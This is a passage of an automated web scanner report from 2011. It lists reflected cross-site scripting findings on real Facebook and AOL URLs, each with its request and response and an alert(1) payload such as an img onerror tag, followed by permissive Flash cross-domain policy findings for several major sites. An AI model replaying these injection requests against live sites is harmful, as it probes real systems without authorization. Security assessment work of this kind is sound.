<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var origUrl="http%3A%2F%2Fwww.aol.com%2F";
var ae_url="https://www.aol.com/aimexpress.jsp";
cookies.set("rrpmo1","rr1~2~1304556981389~05d687"-alert(1)-"65e99ea59a8");</script>
...[SNIP]...

2.52. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Alexander-Bucky-Jordan/1242845259

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b was submitted in the REST URL parameter 3. This input was echoed as e76bc<img src=a onerror=alert(1)>b0233c9330b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Alexander-Bucky-Jordan/1242845259e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.41
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 55

/1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b

2.53. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan%20/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 was submitted in the REST URL parameter 3. This input was echoed as 1c030<img src=a onerror=alert(1)>5ccc611056 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan%20/1000008248207831c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; wd=907x1007

Response

HTTP/1.1 302 Found
Location: /1000008248207831c030<img src=a onerror=alert(1)>5ccc611056
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.33
X-Cnection: close
Date: Thu, 05 May 2011 11:44:01 GMT
Content-Length: 59

/1000008248207831c030<img src=a onerror=alert(1)>5ccc611056

2.54. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 41583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd was submitted in the REST URL parameter 3. This input was echoed as 41583<img src=a onerror=alert(1)>ab0e5e0e0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/10000082482078341583<img%20src%3da%20onerror%3dalert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: /10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.236.106
X-Cnection: close
Date: Thu, 05 May 2011 02:52:12 GMT
Content-Length: 60

/10000082482078341583<img src=a onerror=alert(1)>ab0e5e0e0bd

2.55. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /people/Bucky-Jordan/100000824820783/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 was submitted in the REST URL parameter 4. This input was echoed as a46e0<img src=a onerror=alert(1)>3df2a38ae45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Bucky-Jordan/100000824820783/x22a46e0<img%20src%3da%20onerror%3dalert(1)>3df2a38ae45 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /x22a46e0<img src=a onerror=alert(1)>3df2a38ae45
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.43
Connection: close
Date: Thu, 05 May 2011 11:43:07 GMT
Content-Length: 48

/x22a46e0<img src=a onerror=alert(1)>3df2a38ae45

3. Flash cross-domain policy
There are 26 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://www.aolcdn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolcdn.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Date: Thu, 05 May 2011 00:58:56 GMT
Content-Length: 421
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.2. http://www.everydayhealth.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everydayhealth.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Fri, 22 Apr 2011 15:55:46 GMT
Accept-Ranges: bytes
ETag: "02df0bd51cc1:3644"
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 10:56:31 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!--used for flash slideshows -->
<cross-domain-policy>
   <site-control permi
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.3. http://www.huffingtonpost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.huffingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix)
Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT
ETag: "13598ce-fd-48a53d22e2200"
Content-Type: application/xml
Date: Thu, 05 May 2011 00:58:42 GMT
Content-Length: 253
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

3.4. http://www.mapquest.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="nZG12c16OqjJIk32ss/xe+wwpew="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:04 GMT; Path=/
Set-Cookie: psession="ul5Rtcgv+4mAPbUgz5v+xO8fVFE="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:04 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:04 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"209-1304454924000"
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Content-Type: application/xml
Content-Length: 209
Date: Thu, 05 May 2011 00:57:04 GMT
Connection: keep-alive

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain
...[SNIP]...

3.5. http://xml.truveo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://xml.truveo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xml.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 20:08:41 GMT
ETag: "1294019-104-4a264b4d30440"
Accept-Ranges: bytes
Content-Length: 260
Keep-Alive: timeout=15, max=65
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
    <site-control perm
...[SNIP]...

3.6. http://www.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

3.7. http://www.aolnews.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolnews.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:19 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 2128
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.digitas.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.publishing.aol.com" />

<allow-access-from domain="*.rewind.com" />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.tmz.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.video.aol.com" />
<allow-access-from domain="*.video.office.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" />

<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="publishing.aol.com" />
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="tmz.warnerbros.com" />
...[SNIP]...

3.8. http://www.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.3 (Oracle)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=28
Expires: Thu, 05 May 2011 12:45:46 GMT
Date: Thu, 05 May 2011 12:45:18 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

3.9. http://www.blogsmithmedia.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogsmithmedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 23 Dec 2010 02:59:47 GMT
Content-Type: application/xml
Cache-Control: max-age=3600
Expires: Thu, 05 May 2011 01:58:26 GMT
Date: Thu, 05 May 2011 00:58:26 GMT
Content-Length: 782
Connection: close
X-N: S

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-in
...[SNIP]...
<allow-access-from domain="*.blogsmith.net" to-ports="*" />
   <allow-access-from domain="*.blogsmith.com" to-ports="*" />
   <allow-access-from domain="*.aolcdn.com" to-ports="*" />
   <allow-access-from domain="*.aol.com" to-ports="*" />
   <allow-access-from domain="*.*.aol.com" to-ports="*" />
   <allow-access-from domain="*.yourminis.com" to-ports="*" />
...[SNIP]...

3.10. http://www.citysbest.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.citysbest.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:38 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999877
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

3.11. http://www.dailyfinance.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyfinance.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 204
Keep-Alive: timeout=5, max=999968
Connection: Keep-Alive
Content-Type: text/xml; charset=utf-8

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.test.aol.com"/>
</cross-domain-pol
...[SNIP]...

3.12. http://www.dooce.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dooce.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Wed, 01 Sep 2010 16:56:47 GMT
ETag: "67b2ba4-120-48f359541d1c0"
Accept-Ranges: bytes
Content-Length: 288
Cache-Control: max-age=1209600
Expires: Thu, 19 May 2011 10:56:30 GMT
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

3.13. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.76.43
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.14. https://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.136.90.127
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
